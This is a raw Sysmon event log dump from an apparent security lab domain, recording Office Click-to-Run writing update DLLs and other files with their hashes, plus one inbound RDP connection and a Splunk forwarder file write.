Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\msolui.dllMD5=F5B3EB589049680E5D8A4FFD81E7AC8E,SHA256=234F94F34AA0308F4A014D51237EDE4C97FF46293C42C1A50207C30FFFF2C6D8,IMPHASH=75C610D0251B4C64BA567071C76C671Ftruetrue 23542300x800000000000000071419Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\msolap.dllMD5=D19F25780AAB26498587ADB5D6B5329C,SHA256=FD1BB8C0262554115EC529919E338138FC49A68300F8C482D5917F6F0EA106F4,IMPHASH=5F0788000E656EC896204427FF49A41Ctruetrue 23542300x800000000000000071418Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.719{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\msmgdsrv.dllMD5=318D485A33ECEC7EC7452E77EB794C7A,SHA256=D0E225AE883E51B2684C28596503E578970C71CC814C5DE4AB097F3F05E4CE98,IMPHASH=9ADA929DB07688E6431435AE06D394ABtruetrue 23542300x800000000000000071417Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.626{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\msmdlocal.dllMD5=F93942E11CE0F4531F8CDC4F5FA97FD1,SHA256=86720FFD1B61670C3AA66598DDE25769C40D31EA32A8CCD185BABCEADB0CB29B,IMPHASH=4F83C7AF405A1139E2625871A16D6A36truetrue 23542300x800000000000000071416Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Microsoft.AnalysisServices.AzureClient.dllMD5=EDC77C9426581D8E5BC0E8E785FE6F66,SHA256=83C963EB4CA40A479AC59065F7AEC766916C4E90578610575D9C3F032D1DFB2F,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071415Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\adal.dllMD5=DF0D356FE3AF695DB60449C59F751D26,SHA256=193E6D0EFAF5D76CE3DC6C8363F72A1FD5C044F0C07D5DCAF963C97AA0A4FDDB,IMPHASH=9B53B105990EE4CB51C94E5E67134796truetrue 23542300x800000000000000071414Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.063{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msolui.rllMD5=3E554CC78D949F6FAAAED7AD2637A880,SHA256=1AE16259D6D42A2B54DEDE93AFA39811E9B0960641D1111CB026BCAD8CF7BD94,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071413Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.063{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msmdsrvi.rllMD5=3DFE3D1976564A3FE6FCF437A575BCE3,SHA256=34874F804055C174AF48FD040255AE035F0A72612DCAB9ECC57B9E8B00B1D6F1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071412Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.048{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msmdsrv.rllMD5=1720B803A80E8D6B04232FF5C1665583,SHA256=0AC69E07CA8544858547AACB9C1C6BF28ADE210408FF12685063BD9D5D469064,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071411Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\trdtv2r41.xslMD5=6428657355471068B16925417AFC4BD4,SHA256=B2540DE757740113FE15DC525C6BA7673D86737D3C755CF93C6BBB1535EF379F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071410Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.032{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\Sybase.xslMD5=8ADDABEC57AC4EEE13EC50A6D8A3F6F8,SHA256=DB6C6345E95277C1AE5DFE3B175673A727FCF03F4BD2160FB18D657202CEE411,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071409Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.016{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sqlpdw.xslMD5=079231B93855C4D5D42C649E67485551,SHA256=1F06E9D328476D2AB54DE14F26E4E0EBE22CFBB1F625AAE8B141C59EC38B5EF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071408Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.016{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql90.xslMD5=A758C9866B1426B185F1B395101DB8A4,SHA256=4C510DDA5571B8F83FE8DA219D4D42A2A7D692812E1C6A360D38BDC9B4DC5A6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071407Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.016{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql70.xslMD5=21D63F1CB061AD73CE2BDA2ACC9D299F,SHA256=250C56E4E7F555B0B3D99C1B1E3E6ED556C1A8DA79546ECB5DF38E442A652DFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071406Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.016{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql2000.xslMD5=C3A33EF6A0C4B793D71D443312BCA0A3,SHA256=2FE08F0C8ABB32B6CBDE10B08A5DCDF7AABFFF8F0E2950A09231CE6CBD2CD1D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071405Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.016{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql120.xslMD5=53D85F5CA2F3B22242C5A822BB59D03C,SHA256=D1057EF17E2860DD7D3A3C23C29597B346A8652467D24052A44ABB3C57162E3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071404Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\orcl7.xslMD5=D020C13A8316B443A734A426396B681A,SHA256=3D4D2C50391B800E4DF5B5711209080C2EA4EE6D74B18B48357A33D9B501C08A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071403Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msql.xslMD5=CB1DBA9B516A4AD5B75248D623886038,SHA256=741376D61FE7D6B2E6E04F97688C470DBD23D3FC399503017A88020470878894,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071402Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xslMD5=07817F87945C259A27537F904AC7D4CE,SHA256=4958924C76280F353FAA16E191B596867B454F5AF301CB1C420ED280CDBD4564,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071401Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\Informix.xslMD5=52449767449CEF651386A81FB888E650,SHA256=40BC6D9B6D6DAEFB182732DFB28CB29B7304780E2A28C24BB4E827795B1FF5F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071400Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\hive.xslMD5=1E6D16E1C46BF192BFA7338DBD7122C5,SHA256=B767A68FA7E73AB32058D77C4786D72D155117437F49CEF5E6A4518460669188,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071399Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\db2v0801.xslMD5=E7705BA3F0FB6C7F481F2DE537576A79,SHA256=E98A1A4F6D96F4DD6A0D30800E010845A3476AEF08E6CFE8A4233A56759CE4CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:51.001{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\as90.xslMD5=7657CD6E4B01A396B99BAF6F5D52F222,SHA256=26C5A0FE600571F341FA4978A13723556E4953C28D4BFCB5D6D7BD041CDF07C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:50.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\as80.xslMD5=F7764EDB7A6BC223E07DF8C3674159AD,SHA256=5D80A0A30D78431191F0A18DA67B53F6E805A53715C6C8D5BAABA3425950495F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049825Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:49.475{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-51215-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049824Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:55:51.262{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B094ABB62DAA33AFA58BB46F1C6F741,SHA256=10300FDFBCF1416AF77E7777C6E67C56E4CDD1D7BD9FB315CE5EFCCF08377676,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\stdole.dllMD5=2878E2CEA511AF5562DAD618218C632A,SHA256=47C51A34D74F03ABBAD26DB22BA84B47022820E9254A4ECC8005BBBF580CBFA9,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SpreadsheetIQ.ExcelServices.dllMD5=BDAAC962219C8C7DC0F1B30071F23EDA,SHA256=81755C70E04424F15358D4EF1A3568A7B24E40DD2ADA8DC5C0193A612D1E4460,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.985{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SpreadsheetIQ.ExcelAddIn.dllMD5=11333643C0DB76370A9D1AE9582D1D80,SHA256=74886AC7E2BEDCE298216D3B01F1B8C27EF1F9989470551AC2BAFABA7C0EE94B,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.969{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SpreadsheetIQ.Diagram.dllMD5=A6E6ECB8A6C96D841ECD8BA2DED616A3,SHA256=861841A6C77442A3C840488213F4E3CF942411E1EA946B574CAD730CF46EF136,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXEMD5=911128B1276D76E417D6917F09065C63,SHA256=6B299DC8379B02FA7A0EE2690498811CC7543DE382F124C47085F9D4B4C7BB5E,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744truetrue 23542300x800000000000000071502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\office.dllMD5=4906AEE1B827317ACFD2CBFE1BEC7C29,SHA256=F891C2ECC2F4006B7D88B4062AB72C01A1FED0E03999F20B598F922271AEA86D,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Northwoods.Go.dllMD5=9315264A60D65305FFB9BC361E9388CC,SHA256=C425A55A2617962FA32B411ACC7A2B951D91FA1052EFCF0980A60823C15A15D9,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.938{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\NativeShim.Resources.dllMD5=781105C0446C0CB1764CA8B47D1097E0,SHA256=3B5B41EEF451BA4FEB426B754FE1EFE65F96EC9C90A02491172651B732C9C9DB,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\NativeShim.dllMD5=A0DC9FE1F1172E1987883413473E6986,SHA256=0D12E4C2FC4D5C51094012B03B07FBB62410CD23DC3B19CCC2B440C8730A53C8,IMPHASH=6B929189FC100659FDDE00ED36D38829truetrue 23542300x800000000000000071498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.923{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\MSVCR110.DLLMD5=1A22AC29230FF06E278CF85992F48C86,SHA256=3A3F61F1D187142BBA9B37B318F6052A09743FF24FCDB3CEE478D1BC5C68D300,IMPHASH=AA8D086DEB6960B10F8791DF466A5610truetrue 23542300x800000000000000071497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Microsoft.Vbe.Interop.dllMD5=A20CD59E25541AA177E11C106A465F6C,SHA256=597EE76F971FB97AD80DDA32DB34B655400DC4233EDAB07438347C7D54BDC073,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.907{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Microsoft.Office.Interop.Excel.dllMD5=0CFCC4FCA72CC6267541A5501CFDBD01,SHA256=FEF0E8E498053503CF769A9B6A0B94F98DE036C6BFBD52C10AAD43C64E5ED7EE,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.891{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Microsoft.Office.Interop.Access.dllMD5=0C0455D5CE691387C61C01C5EA98D8E9,SHA256=6E74B9718FAD2FCAC16A3F10325D6F45EFAABB7C6BFDD8A871E9C38EAA1D6D75,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Microsoft.Office.Interop.Access.dao.dllMD5=A1E3189A137AE36A10ABA880BCE6506B,SHA256=3BE15F1D83BECF561BFE2C09D9B5A30E408CF607882907B0D5A755417CC10332,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Inquire.dllMD5=B5AD6C53B0B97D0DF1C1E990441F9C4B,SHA256=289A5005D8C395953FA8333C5FFDF33F61DE00006B93216ECC6C537E7C6438C5,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.860{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.v11.1.dllMD5=9C9429BE3E84B071239BC8199CD97D5D,SHA256=7550DA2B0699879AD0552777D6CC3499969EAE9BA3E76CA4518D73DC82B41207,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.813{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 